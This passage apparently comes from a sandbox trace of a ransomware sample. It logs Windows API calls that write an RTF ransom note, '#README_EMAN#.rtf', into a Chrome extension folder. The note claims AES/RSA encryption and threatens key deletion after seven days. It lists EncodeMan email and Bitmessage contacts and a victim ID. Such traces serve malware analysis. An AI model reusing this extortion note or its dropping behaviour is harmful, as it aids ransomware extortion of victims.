\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.277] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.277] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x23688d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x86\x8f\x9e\x93?ç\x80q\x1cs\x05ÓGZ¸ºewN\x9eFå\x8f3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0297.277] WriteFile (in: hFile=0x2f4, lpBuffer=0x23688d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x23688d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.278] CloseHandle (hObject=0x2f4) returned 1 [0297.278] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\#readme_eman#.rtf")) returned 0xffffffff [0297.278] GetLastError () returned 0x2 [0297.278] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 